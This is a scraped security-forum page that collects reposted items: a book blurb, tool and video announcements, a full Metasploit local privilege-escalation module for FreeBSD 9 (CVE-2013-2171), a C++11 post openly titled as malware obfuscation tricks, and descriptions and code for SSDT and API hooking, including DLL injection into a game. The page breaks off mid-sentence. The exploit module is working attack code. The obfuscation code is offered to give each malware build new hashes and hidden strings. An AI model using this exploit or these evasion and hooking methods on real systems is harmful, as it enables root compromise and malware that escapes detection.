runtime. A key benefit of the book is a chapter on determining exactly what drivers are needed for your hardware. Also included are recipes that list what you need to do to accomplish a wide range of popular tasks. To quote me, the author of the book: If you want to know how to build, configure, and install a custom Linux kernel on your machine, buy this book. It is written by someone who spends every day building, configuring, and installing custom kernels as part of the development process of this fun, collaborative project called Linux. I'm especially proud of the chapter on how to figure out how to configure a custom kernel based on the hardware running on your machine. This is an essential task for anyone wanting to wring out the best possible speed and control of your hardware. [/TD] [TD][/TD] [/TR] [/TABLE] Audience This book is intended to cover everything that is needed to know in order to properly build, customize, and install the Linux kernel. No programming experience is needed to understand and use this book. Some familiarity with how to use Linux, and some basic command-line usage is expected of the reader. This book is not intended to go into the programming aspects of the Linux kernel; there are many other good books listed in the Bibliography that already cover this topic. Secret Goal (i.e. why I wrote this book and am giving it away for free online) I want this book to help bring more people into the Linux kernel development fold. The act of building a customized kernel for your machine is one of the basic tasks needed to become a Linux kernel developer. The more people that try this out, and realize that there is not any real magic behind the whole Linux kernel process, the more people will be willing to jump in and help out in making the kernel the best that it can be. License This book is available under the terms of the Creative Commons Attribution-ShareAlike 2.5 license. That means that you are free to download and redistribute it. The development of the book was made possible, however, by those who purchase a copy from O'Reilly or elsewhere. Kernel version The book is current as of the 2.6.18 kernel release, newer kernel versions will cause some of the configuration items to move around and new configuration options will be added. However the main concepts in the book still remain for any kernel version released. Downloads The book is available for download in either PDF or DocBook format for the entire book, or by the individual chapter. The entire history of the development of the book (you too can see why the first versions of the book were 1000 pages long) can be downloaded in a git repository. Linux Kernel in a Nutshell chapter files: [TABLE] [TR=class: Odd] [TD]Title page[/TD] [TD]PDF[/TD] [TD][/TD] [/TR] [TR=class: Even] [TD]Copyright and credits[/TD] [TD]PDF[/TD] [TD][/TD] [/TR] [TR=class: Odd] [TD]Preface[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: even] [TD]Part I: Building the Kernel[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: Odd] [TD]Chapter 1: Introduction[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: even] [TD]Chapter 2: Requirements for Building and Using the Kernel[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: Odd] [TD]Chapter 3: Retrieving the Kernel Source[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: even] [TD]Chapter 4: Configuring and Building[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: Odd] [TD]Chapter 5: Installing and Booting from a Kernel [/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: even] [TD]Chapter 6: Upgrading a Kernel[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: Odd] [TD]Part II: Major Customizations[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: even] [TD]Chapter 7: Customizing a Kernel[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: Odd] [TD]Chapter 8: Kernel Configuration Recipes[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: even] [TD]Part III: Kernel Reference[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: Odd] [TD]Chapter 9: Kernel Boot Command-Line Parameter Reference[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: even] [TD]Chapter 10: Kernel Build Command-Line Reference[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: Odd] [TD]Chapter 11: Kernel Configuration Option Reference[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: even] [TD]Part IV: Additional Information[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: Odd] [TD]Appendix A: Helpful Utilities[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: even] [TD]Appendix B: Bibliography[/TD] [TD]PDF[/TD] [TD]DocBook[/TD] [/TR] [TR=class: Odd] [TD]Index[/TD] [TD]PDF[/TD] [TD][/TD] [/TR] [/TABLE] Full Book Downloads: [TABLE] [TR=class: even] [TD] Tarball of all LKN PDF files (3MB)[/TD] [/TR] [TR=class: even] [TD] Tarball of all LKN DocBook files (1MB)[/TD] [/TR] [/TABLE] git tree of the book source can be browsed at http://git2.kernel.org/git/?p=linux/kernel/git/gregkh/lkn.git. To clone this tree, run: git clone git://git.kernel.org/pub/scm/linux/kernel/git/gregkh/lkn.git Sursa: Linux Kernel in a Nutshell
  12. [h=1]FreeBSD 9 Address Space Manipulation Privilege Escalation[/h] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit4 < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::EXE include Msf::Post::Common include Msf::Post::File include Msf::Exploit::FileDropper def initialize(info={}) super( update_info( info, { 'Name' => 'FreeBSD 9 Address Space Manipulation Privilege Escalation', 'Description' => %q{ This module exploits a vulnerability that can be used to modify portions of a process's address space, which may lead to privilege escalation. Systems such as FreeBSD 9.0 and 9.1 are known to be vulnerable. }, 'License' => MSF_LICENSE, 'Author' => [ 'Konstantin Belousov', # Discovery 'Alan Cox', # Discovery 'Hunger', # POC 'sinn3r' # Metasploit ], 'Platform' => [ 'bsd' ], 'Arch' => [ ARCH_X86 ], 'SessionTypes' => [ 'shell' ], 'References' => [ [ 'CVE', '2013-2171' ], [ 'OSVDB', '94414' ], [ 'EDB', '26368' ], [ 'BID', '60615' ], [ 'URL', 'http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc' ] ], 'Targets' => [ [ 'FreeBSD x86', {} ] ], 'DefaultTarget' => 0, 'DisclosureDate' => "Jun 18 2013", } )) register_options([ # It isn't OptPath becuase it's a *remote* path OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]), ], self.class) end def check res = session.shell_command_token("uname -a") return Exploit::CheckCode::Appears if res =~ /FreeBSD 9\.[01]/ Exploit::CheckCode::Safe end def write_file(fname, data) oct_data = "\\" + data.unpack("C*").collect {|e| e.to_s(8)} * "\\" session.shell_command_token("printf \"#{oct_data}\" > #{fname}") session.shell_command_token("chmod +x #{fname}") chk = session.shell_command_token("file #{fname}") return (chk =~ /ERROR: cannot open/) ? false : true end def upload_payload fname = datastore['WritableDir'] fname = "#{fname}/" unless fname =~ %r'/$' if fname.length > 36 fail_with(Exploit::Failure::BadConfig, "WritableDir can't be longer than 33 characters") end fname = "#{fname}#{Rex::Text.rand_text_alpha(4)}" p = generate_payload_exe f = write_file(fname, p) return nil if not f fname end def generate_exploit(payload_fname) # # Metasm does not support FreeBSD executable generation. # path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-2171.bin") x = File.open(path, 'rb') { |f| f.read(f.stat.size) } x.gsub(/MSFABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/, payload_fname.ljust(40, "\x00")) end def upload_exploit(payload_fname) fname = "/tmp/#{Rex::Text.rand_text_alpha(4)}" bin = generate_exploit(payload_fname) f = write_file(fname, bin) return nil if not f fname end def exploit payload_fname = upload_payload fail_with(Exploit::Failure::NotFound, "Payload failed to upload") if payload_fname.nil? print_status("Payload #{payload_fname} uploaded.") exploit_fname = upload_exploit(payload_fname) fail_with(Exploit::Failure::NotFound, "Exploit failed to upload") if exploit_fname.nil? print_status("Exploit #{exploit_fname} uploaded.") register_files_for_cleanup(payload_fname, exploit_fname) print_status("Executing #{exploit_fname}") cmd_exec(exploit_fname) end end Sursa: FreeBSD 9 Address Space Manipulation Privilege Escalation
  13. [TABLE] [TR] [TD=align: justify][TABLE=width: 100%] [TR] [TD=align: justify]Hidden File Finder is the free software to quickly scan and discover all the Hidden files on your Windows system. [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD=align: justify] It performs swift multi threaded scan of all the folders parallely and quickly uncovers all the hidden files. It automatically detects the Hidden Executable Files (EXE, DLL, COM etc) and shows them in red color for easier identification. Similarly 'Hidden Files' are shown in black color and 'Hiddden Folders' are shown in blue color. One of its main feature is the Unhide Operation. You can select one or all of the discovered Hidden files and Unhide them with just a click. Successful 'Unhide operations' are shown in green background color while failed ones are shown in yellow background. It is very easy to use with its cool GUI interface. Particularly, it will be more handy for Penetration testers and Forensic investigators. It is fully portable and works on both 32-bit & 64-bit platforms starting from Windows XP to Windows 8. [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader]Features[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] Free, Easy to use GUI based Software Fast multi threaded Hidden File finder to quickly scan entire computer, drive or folder. Unhide all the Hidden files with one click. Color based representation of Hidden Files/Folders/Executable Files and Unhide operations. Open the folder in explorer by double clicking on the List Sort feature to arrange the Hidden files based on name/size/type/date/path Detailed hidden file scan report in HTML format Fully portable and can be run from anywhere Also includes Installer for local installation/un-installation [/TD] [/TR] [TR] [TD] [/TD] [/TR] [/TABLE] [TABLE] [TR] [TD=class: page_subheader]Screenshots[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD]Screenshot 1: Hidden File Finder showing all the Hidden files/folders discovered during the scan[/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=align: center] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD]Screenshot 2: Detailed HTML Report of Hidden File scanning operation.[/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=align: center] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader]Release History[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] [TABLE=width: 90%, align: center] [TR] [TD=class: page_sub_subheader]Version 1.0: 25th Jun 2013[/TD] [/TR] [TR] [TD]First public release of HiddenFileFinder[/TD] [/TR] [TR] [TD] [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader]Download[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] [TABLE=width: 95%, align: center] [TR] [TD] FREE Download Hidden File Finder v1.0 License : Freeware Platform : Windows XP, 2003, Vista, Windows 7, Windows 8 Download [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [/TABLE] Sursa: Hidden File Finder : Free Tool to Find and Unhide/Remove all the Hidden Files | www.SecurityXploded.com
  14. [h=1]Visual Studio 2013 Preview[/h]By: Robert Green Visual Studio 2013 Preview is here with lots of exciting new features across Windows Store, Desktop and Web development. Dmitry Lyalin joins Robert for a whirlwind tour of this preview of the next release of Visual Studio, which is now available for download. Dmitry and Robert show the following in this episode: Recap of Team Foundation Service announcements from TechEd [02:00], including Team Rooms for collaboration, Code Comments in changesets, mapping backlog items to features IDE improvements [11:00], including more color and redesigned icons, undockable Pending Changes window, Connected IDE and synchronized settings Productivity improvements [17:00], including CodeLens indicators showing references, changes and unit test results, enhanced scrollbar, Peek Definition for inline viewing of definitions Web development improvements [28:00], including Browser Link for connecting Visual Studio directly to browsers, One ASP.NET Debugging and diagnostics improvements [37:00], including edit and continue in 64-bit projects, managed memory analysis in memory dump files, Performance and Diagnostics hub to centralize analysis tools [44:00], async debugging [51:00] Windows Store app development improvements, including new project templates [40:00], Energy Consumption and XAML UI Responsiveness Analyzers [45:00], new controls in XAML and JavaScript [55:00], enhanced IntelliSense and Go To Definition in XAML files [1:00:00] Visual Studio 2013 and Windows 8.1: Visual Studio 2013 Preview download Visual Studio 2013 Preview announcement Windows 8.1 Preview download Windows 8.1 Preview announcement Additional resources: Visual Studio team blog Brian Harry's blog ALM team blog Web tools team blog Modern Application Lifecycle Management talk at TechEd Microsoft ASP.NET, Web, and Cloud Tools Preview talk at TechEd Using Visual Studio 2013 to Diagnose .NET Memory Issues in Production What's new in XAML talk at Build What's new in WinJS talk at Build [h=3]Download[/h] [h=3]How do I download the videos?[/h] To download, right click the file type you would like and pick “Save target as…” or “Save link as…” [h=3]Why should I download videos from Channel9?[/h] It's an easy way to save the videos you like locally. You can save the videos in order to watch them offline. If all you want is to hear the audio, you can download the MP3! [h=3]Which version should I choose?[/h] If you want to view the video on your PC, Xbox or Media Center, download the High Quality WMV file (this is the highest quality version we have available). If you'd like a lower bitrate version, to reduce the download time or cost, then choose the Medium Quality WMV file. If you have a Zune, WP7, iPhone, iPad, or iPod device, choose the low or medium MP4 file. If you just want to hear the audio of the video, choose the MP3 file. Right click “Save as…” MP3 (Audio only) [h=3]File size[/h] 58.9 MB MP4 (iPod, Zune HD) [h=3]File size[/h] 355.3 MB Mid Quality WMV (Lo-band, Mobile) [h=3]File size[/h] 174.0 MB High Quality MP4 (iPad, PC) [h=3]File size[/h] 781.7 MB Mid Quality MP4 (WP7, HTML5) [h=3]File size[/h] 545.2 MB High Quality WMV (PC, Xbox, MCE) Sursa: Visual Studio 2013 Preview | Visual Studio Toolbox | Channel 9
  15. [h=1]Malware related compile-time hacks with C++11[/h]by LeFF Hello, community! This code shows how some features of the new C++11 standard can be used to randomly and automaticaly obfuscate code for every build you make (so for every build you will have different hash-values, different encrypted strings and so on)... I decided to show examples on random code generation, string hashing and string encryption only, as more complex ones gets much harder to read... Code is filled with comments and pretty self-explanatory, but if you have some questions, feel free to ask... Hope this stuff will be useful for you, guys! #include <stdio.h> #include <stdint.h> //-------------------------------------------------------------// // "Malware related compile-time hacks with C++11" by LeFF // // You can use this code however you like, I just don't really // // give a shit, but if you feel some respect for me, please // // don't cut off this comment when copy-pasting... ;-) // //-------------------------------------------------------------// // Usage examples: void exampleRandom1() __attribute__((noinline)); void exampleRandom2() __attribute__((noinline)); void exampleHashing() __attribute__((noinline)); void exampleEncryption() __attribute__((noinline)); #ifndef vxCPLSEED // If you don't specify the seed for algorithms, the time when compilation // started will be used, seed actually changes the results of algorithms... #define vxCPLSEED ((__TIME__[7] - '0') * 1 + (__TIME__[6] - '0') * 10 + \ (__TIME__[4] - '0') * 60 + (__TIME__[3] - '0') * 600 + \ (__TIME__[1] - '0') * 3600 + (__TIME__[0] - '0') * 36000) #endif // The constantify template is used to make sure that the result of constexpr // function will be computed at compile-time instead of run-time template <uint32_t Const> struct vxCplConstantify { enum { Value = Const }; }; // Compile-time mod of a linear congruential pseudorandom number generator, // the actual algorithm was taken from "Numerical Recipes" book constexpr uint32_t vxCplRandom(uint32_t Id) { return (1013904223 + 1664525 * ((Id > 0) ? (vxCplRandom(Id - 1)) : (vxCPLSEED))) & 0xFFFFFFFF; } // Compile-time random macros, can be used to randomize execution // path for separate builds, or compile-time trash code generation #define vxRANDOM(Min, Max) (Min + (vxRAND() % (Max - Min + 1))) #define vxRAND() (vxCplConstantify<vxCplRandom(__COUNTER__ + 1)>::Value) // Compile-time recursive mod of string hashing algorithm, // the actual algorithm was taken from Qt library (this // function isn't case sensitive due to vxCplTolower) constexpr char vxCplTolower(char Ch) { return (Ch >= 'A' && Ch <= 'Z') ? (Ch - 'A' + 'a') : (Ch); } constexpr uint32_t vxCplHashPart3(char Ch, uint32_t Hash) { return ((Hash << 4) + vxCplTolower(Ch)); } constexpr uint32_t vxCplHashPart2(char Ch, uint32_t Hash) { return (vxCplHashPart3(Ch, Hash) ^ ((vxCplHashPart3(Ch, Hash) & 0xF0000000) >> 23)); } constexpr uint32_t vxCplHashPart1(char Ch, uint32_t Hash) { return (vxCplHashPart2(Ch, Hash) & 0x0FFFFFFF); } constexpr uint32_t vxCplHash(const char* Str) { return (*Str) ? (vxCplHashPart1(*Str, vxCplHash(Str + 1))) : (0); } // Compile-time hashing macro, hash values changes using the first pseudorandom number in sequence #define vxHASH(Str) (uint32_t)(vxCplConstantify<vxCplHash(Str)>::Value ^ vxCplConstantify<vxCplRandom(1)>::Value) // Compile-time generator for list of indexes (0, 1, 2, ...) template <uint32_t...> struct vxCplIndexList {}; template <typename IndexList, uint32_t Right> struct vxCplAppend; template <uint32_t... Left, uint32_t Right> struct vxCplAppend<vxCplIndexList<Left...>, Right> { typedef vxCplIndexList<Left..., Right> Result; }; template <uint32_t N> struct vxCplIndexes { typedef typename vxCplAppend<typename vxCplIndexes<N - 1>::Result, N - 1>::Result Result; }; template <> struct vxCplIndexes<0> { typedef vxCplIndexList<> Result; }; // Compile-time string encryption of a single character const char vxCplEncryptCharKey = vxRANDOM(0, 0xFF); constexpr char vxCplEncryptChar(const char Ch, uint32_t Idx) { return Ch ^ (vxCplEncryptCharKey + Idx); } // Compile-time string encryption class template <typename IndexList> struct vxCplEncryptedString; template <uint32_t... Idx> struct vxCplEncryptedString<vxCplIndexList<Idx...> > { char Value[sizeof...(Idx) + 1]; // Buffer for a string // Compile-time constructor constexpr inline vxCplEncryptedString(const char* const Str) : Value({ vxCplEncryptChar(Str[Idx], Idx)... }) {} // Run-time decryption char* decrypt() { for(uint32_t t = 0; t < sizeof...(Idx); t++) { this->Value[t] = this->Value[t] ^ (vxCplEncryptCharKey + t); } this->Value[sizeof...(Idx)] = '\0'; return this->Value; } }; // Compile-time string encryption macro #define vxENCRYPT(Str) (vxCplEncryptedString<vxCplIndexes<sizeof(Str) - 1>::Result>(Str).decrypt()) // A small random code path example void exampleRandom1() { switch(vxRANDOM(1, 4)) { case 1: { printf("exampleRandom1: Code path 1!\n"); break; } case 2: { printf("exampleRandom1: Code path 2!\n"); break; } case 3: { printf("exampleRandom1: Code path 3!\n"); break; } case 4: { printf("exampleRandom1: Code path 4!\n"); break; } default: { printf("Fucking poltergeist!\n"); } } } // A small random code generator example void exampleRandom2() { volatile uint32_t RndVal = vxRANDOM(0, 100); if(vxRAND() % 2) { RndVal += vxRANDOM(0, 100); } else { RndVal -= vxRANDOM(0, 200); } printf("exampleRandom2: %d\n", RndVal); } // A small string hasing example void exampleHashing() { printf("exampleHashing: 0x%08X\n", vxHASH("hello world!")); printf("exampleHashing: 0x%08X\n", vxHASH("HELLO WORLD!")); } void exampleEncryption() { printf("exampleEncryption: %s\n", vxENCRYPT("Hello world!")); } extern "C" void Main() { exampleRandom1(); exampleRandom2(); exampleHashing(); exampleEncryption(); } To build code with GCC/MinGW I used this command: g++ -o main.exe -m32 -std=c++0x -Wall -O3 -Os -fno-exceptions -fno-rtti -flto -masm=intel -e_Main -nostdlib -O3 -Os -flto -s main.cpp -lmsvcrt Compiled binary returs this, as expected: exampleRandom1: Code path 2! exampleRandom2: 145 exampleHashing: 0x2D13947A exampleHashing: 0x2D13947A exampleEncryption: Hello world! Decompiled code, that was generated by compiler: exampleRandom1 proc near var_18= dword ptr -18h push ebp mov ebp, esp sub esp, 18h mov [esp+18h+var_18], offset aExamplerandom1 ; "exampleRandom1: Code path 2!" call puts leave retn exampleRandom1 endp exampleRandom2 proc near var_28= dword ptr -28h var_24= dword ptr -24h var_C= dword ptr -0Ch push ebp mov ebp, esp sub esp, 28h mov [ebp+var_C], 78 mov eax, [ebp+var_C] mov [esp+28h+var_28], offset aExamplerandom2 ; "exampleRandom2: %d\n" add eax, 67 mov [ebp+var_C], eax mov eax, [ebp+var_C] mov [esp+28h+var_24], eax call printf leave retn exampleRandom2 endp exampleHashing proc near var_18= dword ptr -18h var_14= dword ptr -14h push ebp mov ebp, esp sub esp, 18h mov [esp+18h+var_14], 2D13947Ah mov [esp+18h+var_18], offset aExamplehashing ; "exampleHashing: 0x%08X\n" call printf mov [esp+18h+var_14], 2D13947Ah mov [esp+18h+var_18], offset aExamplehashing ; "exampleHashing: 0x%08X\n" call printf leave retn exampleHashing endp exampleEncryption proc near var_28= dword ptr -28h var_24= dword ptr -24h var_15= byte ptr -15h var_14= byte ptr -14h var_13= byte ptr -13h var_12= byte ptr -12h var_11= byte ptr -11h var_10= byte ptr -10h var_F= byte ptr -0Fh var_E= byte ptr -0Eh var_D= byte ptr -0Dh var_C= byte ptr -0Ch var_B= byte ptr -0Bh var_A= byte ptr -0Ah var_9= byte ptr -9 push ebp xor eax, eax mov ebp, esp mov ecx, 0Dh push edi lea edi, [ebp+var_15] sub esp, 24h rep stosb xor eax, eax mov [ebp+var_15], 4Ah mov [ebp+var_14], 66h mov [ebp+var_13], 68h mov [ebp+var_12], 69h mov [ebp+var_11], 69h mov [ebp+var_10], 27h mov [ebp+var_F], 7Fh mov [ebp+var_E], 66h mov [ebp+var_D], 78h mov [ebp+var_C], 67h mov [ebp+var_B], 68h mov [ebp+var_A], 2Ch loc_401045: lea ecx, [eax+2] xor [ebp+eax+var_15], cl inc eax cmp eax, 0Ch lea edx, [ebp+var_15] jnz short loc_401045 mov [esp+28h+var_24], edx mov [esp+28h+var_28], offset aExampleencrypt ; "exampleEncryption: %s\n" mov [ebp+var_9], 0 call printf add esp, 24h pop edi pop ebp retn exampleEncryption endp [h=4]Attached Files[/h] main.rar 650bytes 68 downloads Sursa: Malware related compile-time hacks with C++11 - rohitab.com - Forums
  16. [h=1]My first SSDT hook driver[/h]by zwclose7 Hello, this is my first SSDT hook driver. My driver will hook NtTerminateProcess, NtLoadDriver, NtOpenProcess and NtDeleteValueKey. NtTerminateProcess hook This hook will protect any process named calc.exe from being terminated. NtLoadDriver hook This hook will display the driver name in the debugger/DebugView. NtOpenProcess hook This hook will deny access to any process named cmd.exe, and will return STATUS_ACCESS_DENIED if the process name match. NtDeleteValueKey hook This hook will protect any values named abcdef from being deleted. To load the driver, run the loader.exe in the release folder. This program will install the driver to the system, and then load it. All functions will be unhooked when the driver unloads. [h=4]Attached Files[/h] SSDTHook.zip 287.99K 39 downloads Sursa: My first SSDT hook driver - rohitab.com - Forums zwclose7
  17. [h=1]ExtendedHook Functions c++[/h]By RosDevil [intro] I decided to give away one of my master sources, a bauch of functions that are really useful to hook APIs (or any address) on x86 machines. (i'm writing a x64 version, will be published as soon as possible) ExtendedHook.h 1.46K 17 downloads ExtendedHook.cpp 3.21K 9 downloads [index] This page is divided so: - Function Documentation - EHOOKSTRUCT structure - Usage - Compiler settings and notes to remember - Example 1# - hooking MessageBox - Example 2# - hooking DirectX (version 9 in this case) - Example 3# - hooking WSASend [Functions Documentation] There are 3 main functions (InstallEHook, InstallEHookEx, CustomEHook) and 1 to unhook (UnistallEHook). //InstallEHook bool InstallEHook( LPCSTR API, LPCTSTR lib, PEHOOKSTRUCT EHookA, void * redit ); PARAMETERS LPCSTR API: the name of the API LPCTSTR lib: module name or path PEHOOKSTRUCT EHookA: pointer to an EHOOKSTRUCT void * redit: address of the function that will receive the parameters of the call. When the API is called, it will be redirected there. RETURN VALUE If the function succeeds it returns true, otherwise false. REMARKS This function first tries to get the module through GetModuleHandle of the given dll name or path, if it fails, it tries a LoadLibrary. ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- //InstallEHookEx bool InstallEHookEx( void * TargetAddress, PEHOOKSTRUCT EHookA, void * redit ); PARAMETERS void * TargetAddress: in this case function you give the address of the function to hook. This function is needed especially when you try to hook a function which you don't have the definition but only the address. (See Example 2# to understand better) PEHOOKSTRUCT EHookA: pointer to an EHOOKSTRUCT void * redit: address of the function that will receive the parameters of the call. When the API is called, it will be redirected there. RETURN VALUE If the function succeeds it returns true, otherwise false. ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- //CustomEHook bool CustomEHook( void * TargetAddress, PEHOOKSTRUCT EHookA, void * redit, unsigned int bytes_jmp ); PARAMETERS void * TargetAddress: in this case function you give the address of the function to hook. This function is needed especially when you try to hook a function which you don't have the definition but only the address. (See Example 2# to understand better) PEHOOKSTRUCT EHookA: pointer to an EHOOKSTRUCT void * redit: address of the function that will receive the parameters of the call. When the API is called, it will be redirected there. unsigned int bytes_jmp: integer that cointains the number of bytes that must be copied to hook. This function is specific for the address of strange APIs that might have a particular beginning signature that the above functions don't recognize, mostly you will use this when trying to hook an address in the middle of an API, not at the beginning. RETURN VALUE If the function succeeds it returns true, otherwise false. REMARKS This function is can easily crash if you are not careful, it does not check anything and the given bytes don't corrispond to the end of a specific instruction you won't be able to call the original API, if you do it, it will crash. ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- //UnistallEHook void * UninstallEHook( PEHOOKSTRUCT EHookA ); PARAMETER PEHOOKSTRUCT EHookA: pointer to an EHOOKSTRUCT to unistall the hook. RETURN VALUE If the function succeeds it returns the original address of the API, otherwise NULL. [EHOOKSTRUCT structure] This structure is the core of these functions. typedef struct _EHOOKSTRUCT{ DWORD * adr_init; DWORD * adr_redirect; DWORD * adr_new_api; DWORD bytes_size; }EHOOKSTRUCT, *PEHOOKSTRUCT; MEMBERS DWORD * adr_init: Stores the original address DWORD * adr_redirect: Stores the address of the hook function DWORD * adr_new_api: Stores the address of the NEW API DWORD bytes_size: Number of bytes copied to perform the hook [usage] This is a general summary how to use these functions. It's easier if you look at the examples. #include "ExtendedHook.h" typedef -type- ( -Api Prototype- ) ( -parameters- ); EHOOKSTRUCT api_tohook; //define a function exately the same of the prototype -type- Api_function_hook ( -parameters- ); -type- Api_function_hook ( -parameters- ){ //here you can manage the paramters return ((-Api Prototype-)api_hook.adr_new_api) (- parameters -); //perform the call with any paramters you want, right parameters or changed } int main(){ if (InstallEHook("-Api name-", "-Api module-", &api_tohook, &Api_function_hook) == false){ printf("Error hooking"); return 1; } return 0; } [Compiler settings and notes to remember] This hooking method requires one change in the compiler settings. - Disable intrinsic functions [VC++] Project -> Properties -> Configuration Property -> C/C++ -> Optimization -> Enable Intrinsic Functions -> [No] Notes - When you define the function protoype and its function hook, it must be the same of the orginal API, no changes in the parameters count, moreover remember to put WINAPI (__stdcall) in the definition when is needed, otherwise it won't work. - There are some APIs that are necessary for any other api, like GetModuleHandle, GetProcAddress, LoadLibrary... if you want to hook these APIs remember not to call any other API inside the hook function that requires them, otherwise you will obtain an infinite loop. [Example 1# - hooking MessageBox] #include "stdafx.h" #include "windows.h" #include <iostream> #include "ExtendedHook.h" using namespace std; typedef int (WINAPI * pMessageBox)(HWND myhandle, LPCWSTR text, LPCWSTR caption, UINT types); //function prototype int WINAPI MessageBoxWHooker(HWND myhandle, LPCTSTR text, LPCTSTR caption, UINT types); //function hook EHOOKSTRUCT myApi; //essential structure pMessageBox myMessageBox = NULL; //optional, but i think it is useful int _tmain(int argc, _TCHAR* argv[]) { if (InstallEHook("MessageBoxW", L"User32.dll", &myApi, &MessageBoxWHooker) == false){ wcout<<"Error hooking"<<endl; return 1; } myMessageBox = (pMessageBox)myApi.adr_new_api; //[optional] this will be a MessageBox without hook myMessageBox(0, L"Hooking is my speciality!", L"ROSDEVIL", MB_OK | MB_ICONWARNING); if (MessageBox(0, L"Hi, did you understand?", L"ehi", MB_YESNO) == IDYES) {//this will be hooked! wcout<<"You have pressed yes"<<endl; }else{ wcout<<"You have pressed no"<<endl; } UninstallEHook(&myApi); cin.get(); return 0; } int WINAPI MessageBoxWHooker(HWND myhandle, LPCWSTR text, LPCWSTR caption, UINT types){ wcout<<"-- MessageBoxW hooked!"<<endl; wcout<<"HWND: "<<myhandle<<endl; wcout<<"Text: "<<text<<endl; wcout<<"Caption: "<<caption<<endl; wcout<<"Buttons/Icon: "<<types<<endl; return ((pMessageBox)myApi.adr_new_api)(myhandle, text, caption, types); } [Example 2# - hooking DirectX (version 9 in this case)] This is an cool example, a dll that must be injected from the very beginning of the game. If you delve into DirectX hooking you will know what i'm talking about. It has been tested on Age of Empires 3 (x86). //AgeOfEmpireHook.dll #include "stdafx.h" #include "windows.h" #include "d3dx9.h" #include "ExtendedHook.h" #pragma comment(lib, "d3dx9.lib") void start_hooking(); void WriteText(IDirect3DDevice9 * d3ddev, LPCTSTR text, long x, long y, long width, long height); int times_load = 0; typedef DWORD D3DCOLOR; IDirect3DDevice9 * DeviceInterface; //hook Direct3DCreate9 typedef IDirect3D9 *(WINAPI * pDirect3DCreate9) (UINT SDKVersion); EHOOKSTRUCT api_Direct3DCreate9; IDirect3D9 * WINAPI Direct3DCreate9_Hook(UINT SDKVersion); //hook CreateDevice typedef HRESULT (APIENTRY * pCreateDevice)( IDirect3D9 * pDev, UINT Adapter, D3DDEVTYPE DeviceType, HWND hFocusWindow, DWORD BehaviorFlags, D3DPRESENT_PARAMETERS* pPresentationParameters, IDirect3DDevice9** ppReturnedDeviceInterface ); EHOOKSTRUCT api_CreateDevice; HRESULT APIENTRY CreateDevice_hook(IDirect3D9 * pDev, UINT Adapter, D3DDEVTYPE DeviceType, HWND hFocusWindow, DWORD BehaviorFlags, D3DPRESENT_PARAMETERS* pPresentationParameters, IDirect3DDevice9** ppReturnedDeviceInterface); //Hook EndScene typedef HRESULT (WINAPI * pEndScene)(IDirect3DDevice9 * pDevInter); EHOOKSTRUCT api_EndScene; HRESULT WINAPI EndScene_hook(IDirect3DDevice9 * pDevInter); BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: start_hooking(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } void start_hooking(){ if (InstallEHook("Direct3DCreate9", L"d3d9.dll", &api_Direct3DCreate9, &Direct3DCreate9_Hook)==false){ MessageBox(0, L"Error while hooking Direct3DCreate9", L"Hooker", MB_OK | MB_ICONWARNING); } return; } IDirect3D9 * WINAPI Direct3DCreate9_Hook(UINT SDKVersion){ IDirect3D9 * pDev = ((pDirect3DCreate9)api_Direct3DCreate9.adr_new_api)(SDKVersion); _asm pushad DWORD * vtable = (DWORD*)*((DWORD*)pDev); //VTABLE if (times_load == 1){ //the first time d3d9.dll is used, isn't for the 